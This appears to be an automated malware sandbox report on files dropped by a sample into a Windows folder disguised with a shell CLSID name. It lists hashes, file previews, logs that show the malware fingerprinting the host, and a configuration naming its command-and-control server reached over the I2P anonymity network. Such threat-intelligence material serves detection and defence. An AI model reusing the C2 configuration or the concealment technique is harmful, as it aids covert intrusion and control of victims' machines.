SHA-512:	75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:	false
Preview:	C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5081
Entropy (8bit):	5.7375437469711486
Encrypted:	false
SSDEEP:	96:idH9NYJ9Vr3YPpYPTNYP6YPTYPcYPV30HCEEL25QLi5QLatzLH:AdNiT7+oNZonU30iEx555JtX
MD5:	44C1CB5F571D1B00998284C6532036CB
SHA1:	13FED5B92826C9F176AF4E692D92373B77883BF8
SHA-256:	576725B7C9F9A52DD04B70BBFF36B4113B4A6574E33DB47235BFE1D5740A605B
SHA-512:	037ABE6C580C2A8A283F6CDE761F69C443604C1F2987597FA42B93AD06BE58B75D5343383F043B2C93E9523E2117096A5247FC17648A6E6B19D6B88CD4C3B54A
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1021
Entropy (8bit):	5.4433948268529315
Encrypted:	false
SSDEEP:	24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJAAJ90ERnSXYHe:CFdHS+54yclDYcm9FLPTAt
MD5:	29A1D3E8E9EFDEFC3E26876DEFCDCD0A
SHA1:	D8DC54939D6349A82ACFC0675F7366068661C288
SHA-256:	58A0ED1204A77E2850E7A8937CFE99B6B0F9F8EFF0E28D189A26C5E84AAFD9B3
SHA-512:	192EC9735A8E685D5AC5FD0C0A83892A70B84E0E6B8FFBB6AA1955334A317D327E13604CE6F73A37B216E341F4CC0ED55BAFB3F935592F07E16AE47F6FD3F533
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11ecb070)..[I] (tcp_connect) -> Done(sock=0x350,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14113799
Entropy (8bit):	5.189643011789023
Encrypted:	false
SSDEEP:	1536:JaJvcFh7unJBLgBcix2inqd6wg+E1fhXND2hghv2r7AF9mLnTeW9s4gOkmqh15hq:
MD5:	49A43EEC4FA4E0D6953C9F5070E52AE2
SHA1:	21E629D0D061D379361A5DB299DD4FA578A22D20
SHA-256:	96240CC6EFCD86CE150431DC6AB2B550B0E6BC1CC011E46ADAE52F26F650DE66
SHA-512:	63B6C0681EA11B3709787FF18BC8D5EC4062D6B223046E23A7724B58C47769A7DCD0D2C73498BB31E655F89D4396A52F23048C67DBDCBCA6A806E53055123992
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\4ojubzprlqkwtppa7wo3n2u5z6prjz6km4do2cmqez5fw7mh4jsa.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.568437118493545
Encrypted:	false
SSDEEP:	12:SjrpAVPEqpr9TGiAfYFzgIMJkEYZ2m1RzmQHr6vXsmy5:SfpAEqpr9TGiAKzLPR1hmQL6/ty5
MD5:	862D2AC77B87DEC89194DFE15A3D36D9
SHA1:	2CAE3599AC188441CE2261BBD0EC57A5A6FFAD78
SHA-256:	AD884B9930B43E1174485EF150144584D0C04F66E05029D2C6B22E767293F90F
SHA-512:	3BA4115D63680F9DCEBBA994F8C53ACFCA86FAF85417BA2CB4CC5D8CDDE195084F03387249E8A93ABFF5FE7095AACBD83808434CABFAB1E1748908875225EF3B
Malicious:	false
Preview:	..s\|....I.[.?'mX..........!...v...'n.);[..=\.h......E.{....0..M.1..7v.2...N.JsD.W...t...R..$.ce..y...k.U."'DLp.@.T.$...../T..^..'Q(...w.?.a.d....^W.r4..2 ....u.X...5Bb....fB.........xi.=....@.v..wU . .......y.....eT&....i...Z]Z.O.s.f....H&.@..:.].I.#6..K$.........v.T...4 .Sa..A.....(tjS..M.:(.....R)..X..`\|.w.M.....Mb..(..<M....0:5...%6..*......8.{.f.k..:.R?0...>.o.D4.vf.......p&0..D. .`...p...s....h-RH............D5.0-.:eP/...A......=.jW........uU..N.\....0.{.s..CRXx9A..V

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\5sab7p7e7ioxe2l4gkejqh66ebcur4vug3hbtegsmhp3fhfckuaq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.631290584404791
Encrypted:	false
SSDEEP:	12:foaSx9+zAHy0EBhBfVEcz/aVHrgzHNUXJgdYtNqpQaNn/pOmtINTeZJo:uxYzSlOfqSKk+oEBal/pO3ME
MD5:	470FB6B5B871ACE19163EFFF78E24F2B
SHA1:	DF19A5F1F9C852648E1A6B3A2D95B7CB4D7C7696
SHA-256:	03C0802AD5B1D69D6FC6B1C58D15DD6A34C09BE80E81567CB35F55311EBD70C4
SHA-512:	68DC0C48C196B63E06C72FE8629D1D8570E5CC549E341A2566699933A73CFA7844337BFDFDD3A354B72225790188FC43019C2D8D14824EA29EB6FDE9DF932C79
Malicious:	false
Preview:	X....M........].~}a..l.A.u.....c...`K.1Q....w...X.....5(7.4ild.*7.\|.,}NC.I.)(...-.e..4.......m..W.K7,}.....D.......[R...../5....... ..^w-.M(....F...+..?."}......\cJ...n.}S.......Q.l..s#.(vbZ.u.9...qz.......G.l$$+...H#oc.r........k..}......A...)..... 4.bX.Lr.ET$.dP....<...."..W.M.....HO..9.....Z..:.xdo2..V?6....!.nMN..I.w.8b......X.-Y.hY(..0qTU.....W..QR.(..Ln)..c\.h....>.gkY.p.kS...0.4.C..3....&......F.F...zC.......i...E.3...(7>.$".._..e.~..I..r.faXc!.......e&Pa.../o".....".9\|71l.~

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\ldeorbjrydtdfhlgnxmago242ueojdmzslwisulw5wyezob5laqq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.541194272981684
Encrypted:	false
SSDEEP:	12:u312v/oO5k727M3AW5YX+RcUTvRIdQ/tOeUQoQE/DWQnP5GuPZ:u3u97M3taX+RruKtlUQXE/1Z
MD5:	443DFAC59EEC72425A5FC8A46F992712
SHA1:	68F69B5DB9702B259A0E6949663DA555A4EC0335
SHA-256:	6BEB85B63C49F4C3141EA7E70C0BA9B3EB26C6C2DDFA85931538BB7E57369531
SHA-512:	D3A28F68A413A5B8B7315EB664250DBE8AF26BFCE9EB1256061A19381B98C75BB3B0EDCA045C9E2A8F806E5E066B7090CFF92086D294D913535083EF5828E1D0
Malicious:	false
Preview:	L..{%..9.a.#P..... .K.)..L....aZ....X.v...JH.+......_..r{...TQ.-..... (..t.i.....Ie..4._~"..zR..BE33...+.\C..T.8..+W...2l..:."5lQ`J.)o_$...t<...O..F..Tc.....V.T}m.xPS...^.5....#.k.*..yW........Q.v.....%.....3>..q..f..sgqX.K.v.F..(J....J..=:.W.-....T..-.....HJ..m.s.%%.q.O.%~..qx..r.v.0...5..:1w..,..w.{.T...QV.[^....=<&.P....}..u.........:5Y.....:}...2..u......+mx.F.....=.C....1F.c.i.6.l. W&^oqBy....@...=..r..T".3.~...kG...r...K).U.e..]..........h.K.@./^+.T,..}9..s../..O.....#7.J.k....V

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\v7rlxdz7rj66ttnlyxpxrn6afzmj6ee72ra5jpc55qkerx6ksfkq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.631403585207467
Encrypted:	false
SSDEEP:	12:DvF6Gg/6xJD9TmVYCvCtaWFn2jHxjeBgg6ufWbcU4OrDGYGqo:DBGe9gYyNhjHwBgg6u0cUR/Gx
MD5:	61CE47E283BA10B012B49F3BFF2EB3CF
SHA1:	96105A4F3864111BC5F4E311EFE7414928B80605
SHA-256:	6D4F757C07264BBECC43243D03DB63AB18403C5FC4DD9C61517F18966A86C823
SHA-512:	31CB8175C6243E353EC83E7E6A378CDA8E3441870C999449BDB8F3068B3BD7F385C2A6765F9360D17F264FD2511A0A54AEC514CDD07E24C034D0D564088FC68E
Malicious:	false
Preview:	:......W...YY...[-.V1....BK..6...@.........DbM._~(1f.C.C..&.s....v..aA.....OF.yM0 ..'W.G..6..t.(?]...nU.{_~..w......Bm...w/]..>...B...A.g..5y."......Lm`.....d.....8...6..[.=..N.....5s..T.e'...q.3..1p.......wO...._..<".PI...1<G..b\.F...I..IV.!........q...f..qeRem.NPK[.!R....?......C.....~. ....>.1l~.....)...Z..i...B..".Yn..FB....x..k....O....\|......s.:.jt.......m%........@..t.7..Q..L.....m..z`.7.N..du..u.8..<Zq..cp..J.N=.........H..^....@..W....}..'2..Wv..._...V.4..!..9....I

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r-\routerInfo--hXYrwghVUpdw145IaYc0-a0Vql2i9EpLdVhlBJbCfQ=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	6.739495141686378
Encrypted:	false
SSDEEP:	24:GSRSRSRSRSRSRSRSRSRSaOUYGtgQXgZ4UN9f7OOUQf71DJokuG:GSRSRSRSRSRSRSRSRSRSaOURgQXg+g93
MD5:	6F8F01EA8277DE90F940BF058ECDD4C6
SHA1:	645C0201AEA001A70F5B70449D2A10D8D22D7EC0
SHA-256:	F4E35969912DFADA1D0020C1D9E33B240F4C10F1CAD52724F312E6ECDDF239FC
SHA-512:	6F1C066837E39ADA2E765371DB3512E819D5A63E751EE6D8E846F032DF08B1B2D56AF18F24225A3A708E86D4F93712BDF9FD8669B8C3E02E3FA8226D4A025DCF
Malicious:	false
Preview:	,......\\|..-..`..>...8... .W1..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..Q...b....O...i......A.<W4...}..9......\.";.NA...0H..M.q.v............................NTCP2.u.host=.46.51.90.183;.i=.sNqYdn-uvUTCEUlGZEPFpQ==;.port=.12340;.s=,tWWGajlsaqYxVxh60B2L970MYtjSUGx6Rep08zXwky4=;.v=.2;..........NTCP2...host=.2a02:4540:a8:758d:1:0:4417:d64d;.i=.sNqYdn-uvUTCEUlGZEPFpQ==;.port=.12340;.s=,tWWGajlsaqYxVxh60B2L970MYtjSUGx6Rep08zXwky4=;.v=.2;..........SSU2...caps=.BC;.host=.46.51.90.183;.i=,2tyQkZvW3nmRJJ~E89JTDaaGs13umLJwW7UFzMPSJ0g=;.port=.12340;.s=,q2HWsK0AjEJiSG35jOpqPl4Rd5iFgCaiHmMznFg871Y=;.v=.2;..........SSU2...caps=.BC;.host=.2a02:4540:a8:758d:1:0:4417:d64d;.i=,2tyQkZvW3nmRJJ~E89JTDaaGs13umLJwW7UFzMPSJ0g=;.mtu=.1500;.port=.12340;.s=,q2HWsK0A

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0PH5PjnlqWun0c9z33SXdQAOjtJrS95tjibe0VlgqHc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1068
Entropy (8bit):	6.6983858535009535
Encrypted:	false
SSDEEP:	12:KHA78hurSrJSrSrA8IQIVsO+Bu8JPQIVsa+Bf7LMI6Ng49LZPNdd:Kg4sSrkSr9yD+JH+1s+YZ5
MD5:	0CAAE5B22A7B81CA38CC6EBA5B748F66
SHA1:	73BC14D65F4B9974DF24087386B785AF06CD43B2
SHA-256:	E842C4736337BF049E29F67FA07DB9B9DB01AEDE78E1F4DD3AEAD15CF821C3D9
SHA-512:	70866BA2869BF83159CFA47C5659522BC4B659972E1EB12140BBE6DAC018A56CA94CAA73B0D3E4053A75345FB902DE24AB8B12E3558ED251226EEC46653D2ECC
Malicious:	false
Preview:	.......r...]iJ.R.X.....K..9...Ia.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+a.../....X+.k..2.......])'...+...W....t]i...q..11..+.....................\............NTCP2.u.host=.74.222.100.29;.i=.i5rKowaJJYoDuaArfTkf8g==;.port=.9686;.s=,1DOBhdrPlgLvEAqgKj0vUpIdvPVepje9Puu7Sim9mVg=;.v=.2;..........NTCP2.@.caps=.6;.s=,1DOBhdrPlgLvEAqgKj0vUpIdvPVepje9Puu7Sim9mVg=;.v=.2;..........SSU2...caps=.BC;.host=.74.222.100.29;.i=,rBmOKe5ZJmpwThAro6cflD1pC1TV5Q1n7Kys6zDCyk4=;.port=.9686;.s=,NDG0Wn9C5i4d3WhzAq4tBcE2K2gH6vY83pC4MZjP9m0=;.v=.2;..........SSU2.q.caps=.6;.i=,rBmOKe5ZJmpwThAro6cflD1pC1TV5Q1n7Kys6zDCyk4=;.s=,NDG0Wn9C5i4d3WhzAq4tBcE2K2gH6vY83pC4MZjP9m0=;.v=.2;..^.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.1;.netdb.knownRouters=.81;.router.version=.0.9

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r0\routerInfo-0ftt1JFJ5xa4ViHJ3qNC9jzj9r5pBxER6r95a7wwF~0=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	999
Entropy (8bit):	6.774688234557186
Encrypted:	false
SSDEEP:	24:bcIZZZZZZZZZgXzb4o1wk0XnWEXFgYPrgag+:4IZZZZZZZZZgwo1wnXnWsFgMUI
MD5:	5C67E4B2369A12118E057B003D714CAE
SHA1:	E585DE55EFA9862293CB499B65BD4AA2C1D8ACCD
SHA-256:	3731A87B380957B288F8DAE5A13168C4DCC0E753EBD1D3A134CE4147414C0702
SHA-512:	AC1D398659445A8553B472375E14E7B8A6826F5D8A83FE78845027D7FC8A0BAC60E5977D4F982C7D04AB4E3A0A38886E3AF1734DE1700F43405340853C04A6AC
Malicious:	false
